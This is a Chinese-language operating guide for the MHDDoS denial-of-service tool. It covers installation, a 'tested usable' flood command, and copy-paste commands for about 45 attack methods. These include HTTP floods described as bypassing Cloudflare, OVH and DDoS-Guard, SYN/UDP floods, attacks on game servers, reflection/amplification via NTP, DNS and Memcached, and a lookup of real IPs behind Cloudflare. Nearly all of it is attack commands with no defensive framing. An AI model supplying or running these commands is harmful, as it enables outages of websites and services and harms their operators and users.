MHDD方法完整文档

https://github.com/MatrixTM/MHDDoS
git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
sudo apt install python3-pip
pip install -r requirements.txt

测试可用 python3 /root/MHDDoS/start.py tcp 1.2.3.4:80 1000 600000

📌 通用参数说明

参数 说明 示例值
method 攻击方法名称 get/post/ovh等
url 目标URL(HTTP层) https://example.com
ip:port 目标地址(网络层) 192.168.1.1:80
socks_type 0=全部代理, 1=HTTP, 4=SOCKS4, 5=SOCKS5, 6=随机 1
threads 并发线程数 1000
rpc 每线程请求数(Requests Per Connection) 100
duration 持续时间(秒) 60

🔵 Layer 7 方法 (HTTP层,26种)

GET
发送大量GET请求耗尽服务器资源
python3 start.py get https://example.com 1 1000 proxies/http.txt 100 60
POST
发送大量POST请求增加服务器处理负担
python3 start.py post https://example.com 1 1000 proxies/http.txt 100 60
OVH
绕过OVH主机防护机制
python3 start.py ovh https://example.com 1 1000 proxies/http.txt 100 60
RHEX
发送随机HEX数据,针对OVH防护
python3 start.py rhex https://example.com 1 1000 proxies/http.txt 100 60
STOMP
绕过OVH的验证码防护(chk_captcha)
python3 start.py stomp https://example.com 1 1000 proxies/http.txt 100 60
STRESS
发送高字节HTTP数据包,增加带宽压力
python3 start.py stress https://example.com 1 1000 proxies/http.txt 100 60
DYN
通过随机子域名请求攻击
python3 start.py dyn https://example.com 1 1000 proxies/http.txt 100 60
DOWNLOADER
缓慢读取数据,占用服务器连接
python3 start.py downloader https://example.com 1 1000 proxies/http.txt 100 60
SLOW
Slowloris攻击,保持慢速连接耗尽资源
python3 start.py slow https://example.com 1 1000 proxies/http.txt 100 60
HEAD
发送HEAD请求测试服务器响应
python3 start.py head https://example.com 1 1000 proxies/http.txt 100 60
NULL
使用空UserAgent等异常请求
python3 start.py null https://example.com 1 1000 proxies/http.txt 100 60
COOKIE
发送随机Cookie,针对PHP Cookie检查
python3 start.py cookie https://example.com 1 1000 proxies/http.txt 100 60
PPS
发送简化的GET请求(仅GET / HTTP/1.1)
python3 start.py pps https://example.com 1 1000 proxies/http.txt 100 60
EVEN
GET请求附加额外头部增加复杂性
python3 start.py even https://example.com 1 1000 proxies/http.txt 100 60
GSB
绕过Google Project Shield防护
python3 start.py gsb https://example.com 1 1000 proxies/http.txt 100 60
DGB
绕过DDoS-Guard防护
python3 start.py dgb https://example.com 1 1000 proxies/http.txt 100 60
AVB
绕过ArvanCloud防护
python3 start.py avb https://example.com 1 1000 proxies/http.txt 100 60
BOT
模拟Google Bot请求伪装爬虫
python3 start.py bot https://example.com 1 1000 proxies/http.txt 100 60
APACHE
利用Apache服务器漏洞
python3 start.py apache https://example.com 1 1000 proxies/http.txt 100 60
XMLRPC
利用WordPress XMLRPC接口漏洞
python3 start.py xmlrpc https://example.com/xmlrpc.php 1 1000 proxies/http.txt 100 60
CFB
绕过Cloudflare防护
python3 start.py cfb https://example.com 1 1000 proxies/http.txt 100 60
CFBUAM
绕过Cloudflare Under Attack模式
python3 start.py cfbuam https://example.com 1 1000 proxies/http.txt 100 60
BYPASS
绕过一般反DDoS防护
python3 start.py bypass https://example.com 1 1000 proxies/http.txt 100 60
BOMB
使用bombardier工具绕过防护
python3 start.py bomb https://example.com 1 1000 proxies/http.txt 100 60
KILLER
高强度多线程攻击耗尽资源
python3 start.py killer https://example.com 1 1000 proxies/http.txt 100 60
TOR
攻击Tor洋葱网络网站
python3 start.py tor http://example.onion 1 1000 proxies/http.txt 100 60

🟢 Layer 4 方法 (网络层,19种)

📌 网络层命令格式

普通格式: python3 start.py <method> <ip:port> <threads> <duration>

代理格式: python3 start.py <method> <ip:port> <threads> <duration> <socks_type> <proxylist>

放大攻击: python3 start.py <method> <ip:port> <threads> <duration> <reflector_file>

TCP
发送大量TCP数据包耗尽连接
python3 start.py tcp 192.168.1.1:80 1000 60
UDP
发送UDP数据包占用带宽
python3 start.py udp 192.168.1.1:80 1000 60
SYN
SYN洪水攻击(半连接攻击)
python3 start.py syn 192.168.1.1:80 1000 60
CPS
快速开关代理连接耗尽连接池
python3 start.py cps 192.168.1.1:80 1000 60 1 proxies/http.txt
ICMP
ICMP回显请求洪水(Layer3)
python3 start.py icmp 192.168.1.1 1000 60
CONNECTION
保持代理连接占用资源
python3 start.py connection 192.168.1.1:80 1000 60 1 proxies/http.txt
VSE
攻击Valve Source Engine游戏服务器
python3 start.py vse 192.168.1.1:27015 1000 60
TS3
攻击TeamSpeak 3服务器
python3 start.py ts3 192.168.1.1:9987 1000 60
FIVEM
攻击FiveM服务器
python3 start.py fivem 192.168.1.1:30120 1000 60
MEM
Memcached协议放大攻击
python3 start.py mem 192.168.1.1:11211 1000 60 reflectors/memcached.txt
NTP
NTP协议放大攻击
python3 start.py ntp 192.168.1.1:123 1000 60 reflectors/ntp.txt
MCBOT
模拟Minecraft机器人攻击
python3 start.py mcbot 192.168.1.1:25565 1000 60
MINECRAFT
攻击Minecraft服务器
python3 start.py minecraft 192.168.1.1:25565 1000 60
MCPE
攻击Minecraft PE服务器
python3 start.py mcpe 192.168.1.1:19132 1000 60
DNS
DNS协议放大攻击
python3 start.py dns 192.168.1.1:53 1000 60 reflectors/dns.txt
CHAR
Chargen协议放大攻击
python3 start.py char 192.168.1.1:19 1000 60 reflectors/chargen.txt
CLDAP
CLDAP协议放大攻击
python3 start.py cldap 192.168.1.1:389 1000 60 reflectors/cldap.txt
ARD
Apple Remote Desktop放大攻击
python3 start.py ard 192.168.1.1:3283 1000 60 reflectors/ard.txt
RDP
Remote Desktop Protocol放大攻击
python3 start.py rdp 192.168.1.1:3389 1000 60 reflectors/rdp.txt

🛠️ 工具方法 (7种)

工具菜单
进入交互式工具菜单
python3 start.py tools
CFIP
查找Cloudflare网站真实IP
python3 start.py cfip https://example.com
DNS
查询目标域名DNS记录
python3 start.py dns example.com
TSSRV
解析TeamSpeak的SRV记录
python3 start.py tssrv example.com
PING
测试服务器连通性
python3 start.py ping 192.168.1.1
CHECK
检查网站在线状态
python3 start.py check https://example.com
DSTAT
显示流量统计
python3 start.py dstat

⚙️ 其他方法 (3种)

STOP
停止所有攻击
python3 start.py stop
HELP
显示帮助信息
python3 start.py help
INFO
显示脚本信息
python3 start.py info

📝 注意事项

⚠️ 重要提示

  1. 代理文件:Layer7方法需要proxies/<type>.txt文件(如proxies/http.txt),格式为ip:port
  2. 放大攻击:需要reflectors/<type>.txt文件(如reflectors/ntp.txt)
  3. 性能监控:高线程数可能导致系统过载,建议使用top命令监控
  4. 依赖问题:出现版本警告时可运行:
    pip3 install --upgrade requests urllib3 charset-normalizer